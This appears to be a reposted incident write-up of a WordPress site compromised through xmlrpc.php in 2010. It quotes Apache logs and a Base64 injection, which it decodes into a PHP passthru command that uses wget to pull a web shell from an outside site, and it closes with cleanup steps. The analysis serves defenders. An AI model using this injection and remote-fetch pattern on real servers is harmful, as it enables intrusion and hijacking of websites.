WordPress xmlrpc.php flaw exploited to install a WSO 2.1 Web Shell by oRb

Posted 亦非台

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WordPress xmlrpc.php flaw exploited to install a WSO 2.1 Web Shell by oRb相关的知识,希望对你有一定的参考价值。

WordPress xmlrpc.php flaw exploited to install a “WSO 2.1 Web Shell by oRb”

Below you can see in the copy of the apache logs how the Russian exploiter first creates an account on the exploitable wordpress system. It is useful to disable automated registrations on your wordpress system. However sometimes you want this to be open if you have a forum installed on your wordpress system.

95.52.64.98 – – [30/Oct/2010:17:10:49 +0200] “POST /wp-login.php?action=register HTTP/1.1” 302 20 “http://www……..org/wp-login.php?action=register” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)”

95.52.64.98 – – [30/Oct/2010:17:11:17 +0200] “POST /wp-login.php HTTP/1.0” 302 – “http://www…….org/wp-login.php” “Opera”

After logging in you can see how the cracker installs his remote shell remotely from another compromised website by abusing an exploit in xmlrpc.php file.

95.52.64.98 – – [30/Oct/2010:17:11:20 +0200] “POST /xmlrpc.php HTTP/1.0” 200 4366 “cHJpbnQgJzxtYWdpY19zZW9fdG9vbHo+JztwYXNzdGhydSgid2dldCBodHRwOi8vd3d3LmVkdHV0b3JpYWwubmV0L3dfb2xkLnR4dDsgbXYgd19vbGQudHh0IGNhY2hlLnBocDsgbHMgLWFsOyBwd2QiKTtleGl0Ow==” “Opera”

95.52.64.98 – – [30/Oct/2010:17:11:22 +0200] “POST /wp-admin//options-permalink.php HTTP/1.0” 200 9491 “http://www…….org/wp-admin//options-permalink.php” “Opera”

You can read that the xmlrpc.php is injected with Base64 encoded input. If you decode the Base64 encoded string it reads something like this:

print ‘<magic_seo_toolz>’;passthru(“wget http://www.edtutorial.net/w_old.txt; mv w_old.txt cache.php; ls -al; pwd”);exit;

This is php code to retrieve a remotely hosted file w_old.txt and renaming it to cache.php file on the server.

cache.php is the name of the remote web shell you can access this file yourself if no password has been set by the cracker. Main issue with this shell is that the wp-config.php is readable as text so your database username and password are compromised, you must change your password after you fixed the issue!

95.52.64.98 – – [30/Oct/2010:17:12:14 +0200] “POST /cache.php HTTP/1.1” 200 4510 “/cache.php” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)”

How was this possible? First of all the webroot directory had the wrong permissions 777 and second the wordpress installation was one year old and had some XML-RPC exploitable issues.

How to fix this once your site has been compromised?

  1. The permissions of the webroot must be changed to 755.
  2. Then the wordpress installation must be deleted and a whole new install must be copied to the server.  Be sure to retain a copy of the web shell for your hosting security officer.
  3. After this the password of the wordpress database username has to be changed.
  4. The wordpress database must be restored from a backup so any spam links injected since the crack are removed.
  5. The wordpress database must be upgraded, can be done by the admin via wp-admin.
  6. Last but not least the whole shared server had to be scanned for any extra shells owned by user www-data, httpd or user apache depending on the operating system. So if you are hosted on a shared hosting platform you must inform your security officer that your wordpress installation was compromised so he/she can perform a security check of the server.
  7. Backup, backup, backup! Be sure to always have multiple backups of your wordpress database on your own pc. This exploit is mostly abused by blackhat SEO companies to spamvertise their websites via your RSS feed and having a “clean” backup will save you a lot of time.

以上是关于WordPress xmlrpc.php flaw exploited to install a WSO 2.1 Web Shell by oRb的主要内容,如果未能解决你的问题,请参考以下文章

防止WordPress利用xmlrpc.php进行暴力破解以及DDoS

apache_conf Den Zugriff auf die xmlrpc.php von WordPress unterbinden

增强WordPress安全性的10个Nginx规则

常见博客api地址

全局阻止所有 xmlrpc.php 请求 cpanel 服务器

apache_conf 阻止Apache .htaccess中的xmlrpc.php